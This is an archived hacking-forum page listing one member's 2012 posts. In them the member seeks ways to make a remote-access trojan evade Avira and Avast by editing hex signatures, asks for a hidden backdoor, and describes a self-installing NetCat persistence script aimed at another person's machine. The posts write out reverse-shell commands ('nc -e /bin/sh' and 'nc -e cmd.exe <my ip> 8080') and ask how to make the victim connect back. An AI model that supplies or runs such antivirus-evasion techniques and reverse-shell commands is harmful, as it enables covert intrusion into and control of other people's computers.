1
Tutorials / Re: Bypassing AntiVirus Scanner
« on: April 23, 2012, 07:26:31 PM »
I wonder if you could fool AVs if you use a really complex custom encoder, or if they'd still detect it...
This forum is in archive mode. You will not be able to post new content.
Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Pages: [1]
2
Hacking and Security / Re: [Question] Assembly Ghostwriting - Problem
« on: April 23, 2012, 03:29:03 PM »
That depends on what is being found. If It's a simple string, try re-writing it to lowercase:
e.g.:
Detected: DDOSYNFLOOD
Undetected: ddosynflood
Problem is, if the detected part is for example, in the code section, changing the Hex Code will probably break your Program.
e.g.:
Detected: DDOSYNFLOOD
Undetected: ddosynflood
Problem is, if the detected part is for example, in the code section, changing the Hex Code will probably break your Program.
3
Tutorials / Re: Bypassing AntiVirus Scanner
« on: April 23, 2012, 03:26:17 PM »
This method will only fool the stupidest of AVs, but thanks for posting nontheless, was an interesting read.
4
Hacking and Security / Re: [Question] Assembly Ghostwriting - Problem
« on: April 21, 2012, 04:00:52 AM »
I'm not randomly changing content. The executable was split with each file being 1 byte bigger than the last. All of them were scanned showing me at which byte the AV starts detecting the signature. The highlighted part is the signature the AV is detecting with static binary analasys and that's what I'm trying to change. Already got it to work though! 
5
Hacking and Security / [Question] Assembly Ghostwriting - Problem
« on: April 20, 2012, 01:26:21 AM »
Ok so here's my problem. I'm trying to make a RAT undetected by Avira with Assembly Ghostwriting using Hex Workshop, problem is, the Virus Signature that Avast detected seems to be the file padding(?).
-> The Highlited part is the (by Heuretics) as Crypted detected Virus signature (suspicious, not as a threat)!
-> Only the very last Byte of the executable got detected as a Backdoor (by Static Binary Analysis) (threat)!
-> In this case that would be Hex Value 44 or the
Now this seems very strange to me, first because what has been detected seems to be the padding which, afaik is empty code (or is it?), and secondly because only the very last Byte got detected as a trojan.
I tried changing the padding (which im not even sure if that's a string or not) to lowercase to change the Hex Code and spoof the AV; didn't work. Also tried deleting all of the highlighted Hex Code and executing it, but it told me that it was an invalid win32 executable.
Anybody got any ideas?
Thanks!
-> The Highlited part is the (by Heuretics) as Crypted detected Virus signature (suspicious, not as a threat)!
-> Only the very last Byte of the executable got detected as a Backdoor (by Static Binary Analysis) (threat)!
-> In this case that would be Hex Value 44 or the
Now this seems very strange to me, first because what has been detected seems to be the padding which, afaik is empty code (or is it?), and secondly because only the very last Byte got detected as a trojan.
I tried changing the padding (which im not even sure if that's a string or not) to lowercase to change the Hex Code and spoof the AV; didn't work. Also tried deleting all of the highlighted Hex Code and executing it, but it told me that it was an invalid win32 executable.
Anybody got any ideas?
Thanks!
6
Hacking and Security / Re: [Request] DSplit Download?
« on: April 19, 2012, 05:18:28 PM »
Trying to make Trojans undetectable using Ghost Writing ASM. Dsplit is very convenient for that. I've alread found it in the web though, thanks anyways ;P
7
Hacking and Security / Re: [Request] DSplit Download?
« on: April 19, 2012, 10:32:34 AM »
Trying to split .exes and mess around abit.
8
Hacking and Security / [Request] DSplit Download?
« on: April 19, 2012, 01:39:31 AM »
Need a good splitting program that keeps the extension.
Looking for DSplit but only found it on one site and my AV started spazzing out. Anybody have a link or an alternative? Thanks!
Looking for DSplit but only found it on one site and my AV started spazzing out. Anybody have a link or an alternative? Thanks!
9
Hacking and Security / Hidden non-UNIX TCP/IP based Backdoor?
« on: April 18, 2012, 03:20:23 PM »
Are there any TCP/IP based hidden backdoors for non-UNIX systems out there? I've been looking for quite some time now and I'm starting to lose hope. Was thinking about coding my own but I'm not sure if I'm experienced enough yet... Any ideas?
10
Hacking and Security / Re: [Question]NetCat Reverse Shell
« on: April 17, 2012, 11:04:24 PM »
How would nc -e /bin/sh 127.0.0.1 8080; sleep 30; done; give me multiple connections? Wouldn't it have to be a loop with a timer?
On a sidenote thanks for replying
Edit: How do I force it to start cmd.exe on my end once I pick something up while listening on port 8080?
nc -e cmd.exe <my ip> 8080 ?
On a sidenote thanks for replying
Edit: How do I force it to start cmd.exe on my end once I pick something up while listening on port 8080?
nc -e cmd.exe <my ip> 8080 ?
11
Hacking and Security / [Question]NetCat Reverse Shell
« on: April 17, 2012, 09:17:35 PM »
Hey there,
So I'm new to this forum and programming/hacking in general and I've started learning python, but to waste time on the side I was messing around abit with NetCat.
I've created a script that loads itself into sys32 on the homedrive, into autorun and the registry, starts NetCat listening on Port 8080. Problem is that I'M connecting to him and not the other way around, meaning if he doesn't have Port 8080 open I won't be able to connect.
So my question is, how do I create a Reverse Shell(?) so that he connects to me?
Thanks in advance!
So I'm new to this forum and programming/hacking in general and I've started learning python, but to waste time on the side I was messing around abit with NetCat.
I've created a script that loads itself into sys32 on the homedrive, into autorun and the registry, starts NetCat listening on Port 8080. Problem is that I'M connecting to him and not the other way around, meaning if he doesn't have Port 8080 open I won't be able to connect.
So my question is, how do I create a Reverse Shell(?) so that he connects to me?
Thanks in advance!
Pages: [1]